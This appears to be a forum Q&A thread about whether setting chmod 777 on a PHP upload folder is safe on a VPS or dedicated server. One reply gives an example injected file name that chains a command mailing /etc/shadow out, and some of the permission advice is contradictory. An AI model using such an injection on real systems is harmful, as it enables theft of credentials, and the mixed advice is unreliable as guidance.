Is it safe to chmod to 777 on a vps or dedicated server?

Hi,
I'm writing an upload app. in php. The uploaded files are moved and checked by php. But my client is on a shared hosting provider.
In order for php to move the files to the right folder, that folder needs to be chmod'ed to 777. I have been googling and found many people saying chmod 777 isn't safe on a shared host.
I was wondering if chmod 777 poses any security problem if the application would be hosted on a vps or dedicated server?

kind regards,
Peter
petervanlaerAsked:
Who is Participating?
 
kblack05Commented:
Permissions mask 0777 is *always* dangerous because it means that anyone can read/write/execute files within that directory structure. Typically this is a managed risk, and if you must have these kinds of features it's good to investigate using the SUID features...

Have a look at this thread, it's pretty descriptive:

http://www.linuxforums.org/forum/servers/17786-working-my-way-around-0777-issue-would-suid-guid-help.html
0
 
petervanlaerAuthor Commented:
as far as i understand it, *everyone* having permission doesn't include the average joe on the internet, but only everyone who has an account or access to that machine.

if the machine is:

* on a shared hosting solution
* has anon ftp access or a number of other entry points the general public can use
* is a workstation that many people log into

then 777 is a bad idea. right?

feel free to correct any inaccuracies in the above; i'm not a unix guru by any stretch of the imagination, but it's my understanding 777 doesn't just mean some random joe can laser all yer stuff if they don't have an account of some sort on the machine.
0
 
kblack05Commented:
Well here's the jist of it, if the perms are wide open, anything CAN and DOES happen. For example some hotshot out there may notice, and use your upload input bin to add special characters, such as "filetoupload.txt; sendmail user@domain.com < /etc/shadow" or some other perversion.

If you aren't rigorously verifying input in your PHP script, the Apache server may possibly be made to work against you.
0
Protect Your Employees from Wi-Fi Threats

As Wi-Fi growth and popularity continues to climb, not everyone understands the risks that come with connecting to public Wi-Fi or even offering Wi-Fi to employees, visitors and guests. Download the resource kit to make sure your safe wherever business takes you!

 
kblack05Commented:
Or rather, they may be able to upload some arbitrary scripting, and then escape the php line to run the script, and possibly hose the box, or trojan it.
0
 
xDamoxCommented:
Hi,

777 permission is not secure :( on any machine, when you run a PHP your PHP script it runs as that user so I think a directory
permission of 755 will be ok for your PHP script
0
 
kblack05Commented:
He's running an upload program. It needs write access.
0
 
xDamoxCommented:
Hi,

Yea but the PHP script is probably running with his permissions so a file 755 should be sufficiant. As he has read,write and execute
whereas the others only have read and execte
0
 
xDamoxCommented:
Sorry just double checked mine you will need 777 on uploads
0
 
ahoffmannCommented:
simple questio, simple answer: no
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.